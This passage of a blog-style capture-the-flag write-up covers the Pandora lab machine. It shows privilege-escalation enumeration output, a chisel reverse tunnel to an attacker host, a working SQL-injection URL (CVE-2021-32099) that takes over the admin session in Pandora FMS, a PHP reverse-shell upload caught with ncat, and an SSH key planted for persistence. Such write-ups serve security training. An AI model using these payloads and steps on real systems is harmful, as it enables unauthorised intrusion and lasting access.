drwxr-xr-x 2 root root 4096 Dec  3 12:57 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec  3 12:57 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec  3 12:56 /etc/apache2/sites-enabled/000-default.conf -&amp;gt; ../sites-available/000-default.conf
&amp;lt;VirtualHost &lt;span class="k"&gt;*&lt;/span&gt;:80&amp;gt;
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;APACHE_LOG_DIR&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;/error.log
        CustomLog &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;APACHE_LOG_DIR&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;/access.log combined
&amp;lt;/VirtualHost&amp;gt;
lrwxrwxrwx 1 root root 31 Dec  3 12:53 /etc/apache2/sites-enabled/pandora.conf -&amp;gt; ../sites-available/pandora.conf
&amp;lt;VirtualHost localhost:80&amp;gt;
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  &amp;lt;Directory /var/www/pandora&amp;gt;
    AllowOverride All
  &amp;lt;/Directory&amp;gt;
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 72958 Jun 11  2021 /etc/php/7.4/apache2/php.ini
allow_url_fopen &lt;span class="o"&gt;=&lt;/span&gt; On
allow_url_include &lt;span class="o"&gt;=&lt;/span&gt; Off
odbc.allow_persistent &lt;span class="o"&gt;=&lt;/span&gt; On
mysqli.allow_persistent &lt;span class="o"&gt;=&lt;/span&gt; On
pgsql.allow_persistent &lt;span class="o"&gt;=&lt;/span&gt; On
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 72539 Oct  6  2020 /etc/php/7.4/cli/php.ini
allow_url_fopen &lt;span class="o"&gt;=&lt;/span&gt; On
allow_url_include &lt;span class="o"&gt;=&lt;/span&gt; Off
odbc.allow_persistent &lt;span class="o"&gt;=&lt;/span&gt; On
mysqli.allow_persistent &lt;span class="o"&gt;=&lt;/span&gt; On
pgsql.allow_persistent &lt;span class="o"&gt;=&lt;/span&gt; On
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions                                                                       
tmux 3.0a                                                                                                                                                    

/tmp/tmux-1001
╔══════════╣ Analyzing Backup Manager Files &lt;span class="o"&gt;(&lt;/span&gt;limit 70&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 14844 Mar  4  2020 /usr/share/php/DB/storage.php                                                                                      

&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt 2222 Jan  3  2020 /var/www/pandora/pandora_console/include/help/en/help_history_database.php
&amp;lt;i&amp;gt;Mysql Example: GRANT ALL PRIVILEGES ON pandora.&lt;span class="k"&gt;*&lt;/span&gt; TO &lt;span class="s1"&gt;'pandora'&lt;/span&gt;@&lt;span class="s1"&gt;'IP'&lt;/span&gt; IDENTIFIED BY &lt;span class="s1"&gt;'password'&lt;/span&gt;&amp;lt;/i&amp;gt;
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt 2666 Jan  3  2020 /var/www/pandora/pandora_console/include/help/es/help_history_database.php
&amp;lt;i&amp;gt;Mysql Example: GRANT ALL PRIVILEGES ON pandora.&lt;span class="k"&gt;*&lt;/span&gt; TO &lt;span class="s1"&gt;'pandora'&lt;/span&gt;@&lt;span class="s1"&gt;'IP'&lt;/span&gt; IDENTIFIED BY &lt;span class="s1"&gt;'password'&lt;/span&gt;&amp;lt;/i&amp;gt;
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt 3159 Jan  3  2020 /var/www/pandora/pandora_console/include/help/ja/help_history_database.php
&amp;lt;i&amp;gt;Mysql Example: GRANT ALL PRIVILEGES ON pandora.&lt;span class="k"&gt;*&lt;/span&gt; TO &lt;span class="s1"&gt;'pandora'&lt;/span&gt;@&lt;span class="s1"&gt;'IP'&lt;/span&gt; IDENTIFIED BY &lt;span class="s1"&gt;'password'&lt;/span&gt;&amp;lt;/i&amp;gt;

╔══════════╣ Searching uncommon passwd files &lt;span class="o"&gt;(&lt;/span&gt;splunk&lt;span class="o"&gt;)&lt;/span&gt;
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching docker files &lt;span class="o"&gt;(&lt;/span&gt;limit 70&lt;span class="o"&gt;)&lt;/span&gt;
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation                                      
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt 1263 Jan  3  2020 /var/www/pandora/pandora_console/Dockerfile

╔══════════╣ Analyzing Bind Files &lt;span class="o"&gt;(&lt;/span&gt;limit 70&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                          

═══════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                                                      
                                         ╚═══════════════════╝                                                                                               
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid 
&lt;span class="nt"&gt;-rwsr-x---&lt;/span&gt; 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup &lt;span class="o"&gt;(&lt;/span&gt;Unknown SUID binary&lt;span class="o"&gt;)&lt;/span&gt;

╔══════════╣ Backup files &lt;span class="o"&gt;(&lt;/span&gt;limited 100&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="nt"&gt;-rwxr-xr-x&lt;/span&gt; 1 root root 44071 Nov 21 00:08 /usr/bin/wsrep_sst_mariabackup

╔══════════╣ Searching &lt;span class="k"&gt;*&lt;/span&gt;password&lt;span class="k"&gt;*&lt;/span&gt; or &lt;span class="k"&gt;*&lt;/span&gt;credential&lt;span class="k"&gt;*&lt;/span&gt; files &lt;span class="k"&gt;in &lt;/span&gt;home &lt;span class="o"&gt;(&lt;/span&gt;limit 70&lt;span class="o"&gt;)&lt;/span&gt;

/var/www/pandora/pandora_console/godmode/groups/credential_store.php
/var/www/pandora/pandora_console/include/functions_credential_store.php
/var/www/pandora/pandora_console/images/user_password.png

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Also running LSE. Below are all the things different from the linpeas run&lt;/p&gt;

&lt;h2&gt;
  
  
  lse run
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;[!]&lt;/span&gt; sof080 Can we write to a gpg-agent socket?............................. &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
/run/user/1001/gnupg/S.gpg-agent
/run/user/1001/gnupg/S.gpg-agent.ssh
/run/user/1001/gnupg/S.gpg-agent.extra
/run/user/1001/gnupg/S.gpg-agent.browser

&lt;span class="o"&gt;===================================================================(&lt;/span&gt; CVEs &lt;span class="o"&gt;)=====&lt;/span&gt;                                                                             
&lt;span class="o"&gt;[!]&lt;/span&gt; cve-2021-4034 Checking &lt;span class="k"&gt;for &lt;/span&gt;PwnKit vulnerability........................ &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
Vulnerable!
&lt;span class="nt"&gt;---&lt;/span&gt;
&lt;span class="o"&gt;[!]&lt;/span&gt; cve-2022-25636 Netfilter linux kernel vulnerability.................... &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
5.4.0-91-generic
&lt;span class="nt"&gt;---&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Further Steps
&lt;/h2&gt;

&lt;p&gt;Tried messing around in &lt;code&gt;/var/www/pandora&lt;/code&gt; which is the location of a website which hosted at &lt;code&gt;pandora.panda.htb&lt;/code&gt;. Just in case added &lt;code&gt;pandora.pandora.htb&lt;/code&gt; to &lt;code&gt;/etc/hosts&lt;/code&gt;, which had no effect(more on this later). The web dir has &lt;code&gt;matt&lt;/code&gt; permissions. So cannot make any changes. &lt;/p&gt;

&lt;p&gt;It looks to be an install of &lt;a href="https://pandorafms.com/en/"&gt;Pandora FMS&lt;/a&gt; . So if we can get it to spawn a shell, we can a &lt;code&gt;matt&lt;/code&gt; user shell.&lt;/p&gt;

&lt;p&gt;And then I noticed this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;daniel@pandora:/etc/apache2/sites-available&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;pandora.conf 
&amp;lt;VirtualHost localhost:80&amp;gt;
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  &amp;lt;Directory /var/www/pandora&amp;gt;
    AllowOverride All
  &amp;lt;/Directory&amp;gt;
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
&amp;lt;/VirtualHost&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note the &lt;code&gt;localhost&lt;/code&gt; on the first line. This website is only available locally.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;daniel@pandora:/etc/apache2/sites-available&lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://localhost
&lt;span class="k"&gt;*&lt;/span&gt;   Trying ::1:80...
&lt;span class="k"&gt;*&lt;/span&gt; TCP_NODELAY &lt;span class="nb"&gt;set&lt;/span&gt;
&lt;span class="k"&gt;*&lt;/span&gt; Connected to localhost &lt;span class="o"&gt;(&lt;/span&gt;::1&lt;span class="o"&gt;)&lt;/span&gt; port 80 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="c"&gt;#0)&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GET / HTTP/1.1
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Host: localhost
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; User-Agent: curl/7.68.0
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Accept: &lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; 
&lt;span class="k"&gt;*&lt;/span&gt; Mark bundle as not supporting multiuse
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Date: Thu, 19 May 2022 18:54:29 GMT
&amp;lt; Server: Apache/2.4.41 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
&amp;lt; Last-Modified: Fri, 11 Jun 2021 14:55:39 GMT
&amp;lt; ETag: &lt;span class="s2"&gt;"3f-5c47eb370f0c0"&lt;/span&gt;
&amp;lt; Accept-Ranges: bytes
&amp;lt; Content-Length: 63
&amp;lt; Content-Type: text/html
&amp;lt; 
&amp;lt;meta HTTP-EQUIV&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"REFRESH"&lt;/span&gt; &lt;span class="nv"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"0; url=/pandora_console/"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the content of &lt;code&gt;/var/www/pandora/index.html&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reverse Port Forwarding to access internal website.
&lt;/h3&gt;

&lt;p&gt;Let's use &lt;a href="https://github.com/jpillora/chisel"&gt;chisel&lt;/a&gt; to create a relay between the two machines. And access it from our local machine, which will make running exploit vulns on the website easier.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NOTE:&lt;/strong&gt; We can use SSH port forwarding, or use the socat binary present on the machine for this as well(check linpeas useful software list).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;daniel@pandora:~&lt;span class="nv"&gt;$ &lt;/span&gt;lsb_release &lt;span class="nt"&gt;-a&lt;/span&gt;
No LSB modules are available.
Distributor ID: Ubuntu
Description:   Ubuntu 20.04.3 LTS
Release:       20.04
Codename:      focal
daniel@pandora:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;uname&lt;/span&gt; &lt;span class="nt"&gt;-a&lt;/span&gt;
Linux pandora 5.4.0-91-generic &lt;span class="se"&gt;\#&lt;/span&gt;102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's get the linux-amd64 executable from the &lt;a href="https://github.com/jpillora/chisel/releases/"&gt;chisel github releases&lt;/a&gt; , which we can use on both our machine and the remote one..&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# On the remote machine&lt;/span&gt;
daniel@pandora:/tmp/exp&lt;span class="nv"&gt;$ &lt;/span&gt;./chisel server &lt;span class="nt"&gt;--port&lt;/span&gt; 9000 &lt;span class="nt"&gt;--proxy&lt;/span&gt; http://localhost:80
2022/05/19 19:30:40 server: Fingerprint XKMkRmW0yrANxp6Q0gDbxfx20bBU+DZQMNeBAzdlACY&lt;span class="o"&gt;=&lt;/span&gt;
2022/05/19 19:30:40 server: Reverse proxy enabled
2022/05/19 19:30:40 server: Listening on http://0.0.0.0:9000

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's try a simple chisel proxy. It soon becomes clear this does not work. The page is all wonky because a lot of HTML on pandora fms index.html is coded this way&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;link&lt;/span&gt; &lt;span class="na"&gt;rel=&lt;/span&gt;&lt;span class="s"&gt;"stylesheet"&lt;/span&gt; &lt;span class="na"&gt;href=&lt;/span&gt;&lt;span class="s"&gt;"http://localhost/pandora_console/include/styles/common.css"&lt;/span&gt; &lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;"text/css"&lt;/span&gt; &lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;link&lt;/span&gt; &lt;span class="na"&gt;rel=&lt;/span&gt;&lt;span class="s"&gt;"stylesheet"&lt;/span&gt; &lt;span class="na"&gt;href=&lt;/span&gt;&lt;span class="s"&gt;"http://localhost/pandora_console/include/styles/menu.css"&lt;/span&gt; &lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;"text/css"&lt;/span&gt; &lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;link&lt;/span&gt; &lt;span class="na"&gt;rel=&lt;/span&gt;&lt;span class="s"&gt;"stylesheet"&lt;/span&gt; &lt;span class="na"&gt;href=&lt;/span&gt;&lt;span class="s"&gt;"http://localhost/pandora_console/include/styles/tables.css"&lt;/span&gt; &lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;"text/css"&lt;/span&gt; &lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;

&lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"javascript"&lt;/span&gt; &lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;"text/javascript"&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;"http://localhost/pandora_console/include/graphs/flot/jquery.flot.js"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"javascript"&lt;/span&gt; &lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;"text/javascript"&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;"http://localhost/pandora_console/include/graphs/flot/jquery.flot.min.js"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"javascript"&lt;/span&gt; &lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;"text/javascript"&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;"http://localhost/pandora_console/include/graphs/flot/jquery.flot.time.js"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We will need to be able to address this website as &lt;code&gt;http://localhost&lt;/code&gt; on our local machine. &lt;/p&gt;

&lt;p&gt;To accomplish this, we will be using chisel's reverse port forwarding feature. &lt;/p&gt;

&lt;p&gt;TO get this to work. the chisel "server" runs on our machine, aka attacker machine in reverse proxy mode. And the chisel "client" runs on the remote machine.&lt;/p&gt;

&lt;p&gt;Used this as a guide =&amp;gt; &lt;a href="https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683"&gt;https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# on local machine
└─$ ./chisel server -p 3477 --reverse -v
2022/05/19 16:33:34 server: Reverse tunnelling enabled
2022/05/19 16:33:34 server: Fingerprint 98Ub3tYzyTENqnEYjejWa46FQehJHQta2rsD2U0voEI=
2022/05/19 16:33:34 server: Listening on http://0.0.0.0:3477
2022/05/19 16:39:01 server: session#1: Handshaking with 10.10.11.136:54540...
2022/05/19 16:39:01 server: session#1: Verifying configuration
2022/05/19 16:39:01 server: session#1: tun: Created
2022/05/19 16:39:01 server: session#1: tun: proxy#R:80=&amp;gt;80: Listening
2022/05/19 16:39:01 server: session#1: tun: Bound proxies
2022/05/19 16:39:01 server: session#1: tun: SSH connected

# on remote machine
daniel@pandora:/tmp/exp$ ./chisel client 10.10.14.26:3477 R:80:127.0.0.1:80/tcp
2022/05/19 20:38:27 client: Connecting to ws://10.10.14.26:3477
2022/05/19 20:38:27 client: Connected (Latency 44.074267ms)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Chisel server on local machine starts in reverse proxy mode, listens in port 3477 for connections. &lt;/p&gt;

&lt;p&gt;Chisel client on remote machine connects to our chisel server, with the following config&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"R" denotes reverse port forward&lt;/li&gt;
&lt;li&gt;Listen on port 80 on our client machine. Since this is a low number port, we can only do this on our machine(not the remote server)&lt;/li&gt;
&lt;li&gt;Forward everything from localhost:80 to "127.0.0.1:80" on the remote machine, thereby granting access to the Pandora FMS website.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once executed, we can go to &lt;a href="http://localhost"&gt;http://localhost&lt;/a&gt; on our machine. And we can see the Pandora FMS login portal.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pandora FMS Investigation
&lt;/h3&gt;

&lt;p&gt;At the bottom of the page we see &lt;strong&gt;v7.0NG.742_FIX_PERL2020&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now if we could only get the uname/pwd directly from the web app.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;daniel@pandora:/var/www/pandora/pandora_console/include&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-lh&lt;/span&gt; config.php
&lt;span class="nt"&gt;-rw-------&lt;/span&gt; 1 matt matt 413 Dec  3 14:06 config.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Not accessible.&lt;/p&gt;

&lt;p&gt;When we try the creds for &lt;code&gt;daniel&lt;/code&gt;, we get &lt;code&gt;ERROR: User only can use the API.&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Anyway, let's try searching for exploits for this version&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.cve.org/CVERecord?id=CVE-2020-5844"&gt;CVE-2020-5844&lt;/a&gt; CVE record lists thecybergeek(one of the box creators) as discoverer of the vuln. Also lists the exact same version of Pandora FMS. Exploit script from their github &lt;a href="https://github.com/TheCyberGeek/CVE-2020-5844"&gt;https://github.com/TheCyberGeek/CVE-2020-5844&lt;/a&gt;. This is an authenticated RCE bug though.&lt;/p&gt;

&lt;p&gt;After looking at the &lt;a href="https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"&gt;Pandora FMS Vuln List&lt;/a&gt; we see three interesting CVEs&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.cve.org/CVERecord?id=CVE-2021-32098"&gt;CVE-2021-32098&lt;/a&gt; as a vulnerability fixed in v743. Allows unauthenticated attackers to perform Phar deserialization.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cve.org/CVERecord?id=CVE-2021-32099"&gt;CVE-2021-32099&lt;/a&gt; as a vuln ficed in v743. Also unauthenticated.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cve.org/CVERecord?id=CVE-2021-32100"&gt;CVE-2021-32100&lt;/a&gt; "A remote file inclusion vulnerability exists in Artica Pandora FMS 742, exploitable by the lowest privileged user."&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A great explanation on these vulns is here, by the folks who discovered it =&amp;gt; &lt;a href="https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/"&gt;https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;CVE-2021-32099 is &lt;strong&gt;A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session&lt;/strong&gt;. Sounds exactly like what we need.&lt;/p&gt;

&lt;h3&gt;
  
  
  CVE-2021-32099 unauthenticated session upgrade using SQLi
&lt;/h3&gt;

&lt;p&gt;We will use the link available here =&amp;gt; &lt;a href="https://github.com/ibnuuby/CVE-2021-32099"&gt;https://github.com/ibnuuby/CVE-2021-32099&lt;/a&gt;, and remove port 8000 since we dont need it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://localhost/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Put this in the browser. Reload once and then go back to &lt;a href="http://locahost"&gt;http://locahost&lt;/a&gt; and you will be logged in(because of the insertion of a session cookie taken straight from the DB).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Extra Info:&lt;/strong&gt; URL-decode of the above URL to see the SQLi being used&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the interface, under "Admin Tools" we see a file manager =&amp;gt; &lt;a href="http://localhost/pandora_console/index.php?sec=gextensions&amp;amp;sec2=godmode/setup/file_manager"&gt;http://localhost/pandora_console/index.php?sec=gextensions&amp;amp;sec2=godmode/setup/file_manager&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's use this to upload a PHP webshell. On Kali, this is available at &lt;code&gt;/usr/share/webshells/php/php-reverse-shell.php&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Create dir shell. Upload a file in it as &lt;code&gt;shell.php&lt;/code&gt;. And then access it directly. For me it was &lt;a href="http://localhost/pandora_console/images/shell/shell.php"&gt;http://localhost/pandora_console/images/shell/shell.php&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And we GOT IT!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ncat &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 443                
Ncat: Version 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org/ncat &lt;span class="o"&gt;)&lt;/span&gt;
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.11.136.
Ncat: Connection from 10.10.11.136:37958.
Linux pandora 5.4.0-91-generic &lt;span class="c"&gt;#102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux&lt;/span&gt;
 22:27:10 up  6:13,  2 &lt;span class="nb"&gt;users&lt;/span&gt;,  load average: 0.01, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.14.26      16:23   37.00s  0.99s  0.99s &lt;span class="nt"&gt;-bash&lt;/span&gt;
daniel   pts/1    tmux&lt;span class="o"&gt;(&lt;/span&gt;30407&lt;span class="o"&gt;)&lt;/span&gt;.%0   19:29    1:46m  0.88s  0.76s ./chisel client 10.10.14.26:3477 R:80:127.0.0.1:80/tcp
&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt;
/bin/sh: 0: can&lt;span class="s1"&gt;'t access tty; job control turned off
$ python3 -c '&lt;/span&gt;import pty&lt;span class="p"&gt;;&lt;/span&gt; pty.spawn&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"/bin/bash"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="s1"&gt;'
matt@pandora:/$ export TERM=xterm-25color
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Go get that user flag!&lt;/p&gt;

&lt;p&gt;Adding SSH keys, so that we can login using a regular shell and not a clunky reverse shell.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ssh-keygen &lt;span class="nt"&gt;-f&lt;/span&gt; ./pandora-key &lt;span class="nt"&gt;-t&lt;/span&gt; ecdsa &lt;span class="nt"&gt;-b&lt;/span&gt; 521
Generating public/private ecdsa key pair.
Enter passphrase &lt;span class="o"&gt;(&lt;/span&gt;empty &lt;span class="k"&gt;for &lt;/span&gt;no passphrase&lt;span class="o"&gt;)&lt;/span&gt;: 
Enter same passphrase again: 
Your identification has been saved &lt;span class="k"&gt;in&lt;/span&gt; ./pandora-key
Your public key has been saved &lt;span class="k"&gt;in&lt;/span&gt; ./pandora-key.pub
...
...
└─&lt;span class="nv"&gt;$ &lt;/span&gt;ll
total 16
&lt;span class="nt"&gt;-rw-------&lt;/span&gt; 1 kali kali  724 May 19 18:42 pandora-key
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 kali kali  263 May 19 18:42 pandora-key.pub
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Append the pandora-key.pub to &lt;code&gt;~/.ssh/authorized_keys&lt;/code&gt; in matt's home folder. And voila! we have ssh login as matt.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ssh &lt;span class="nt"&gt;-i&lt;/span&gt; pandora-key matt@pandora.htb
Welcome to Ubuntu 20.04.3 LTS &lt;span class="o"&gt;(&lt;/span&gt;GNU/Linux 5.4.0-91-generic x86_64&lt;span class="o"&gt;)&lt;/span&gt;
...
...
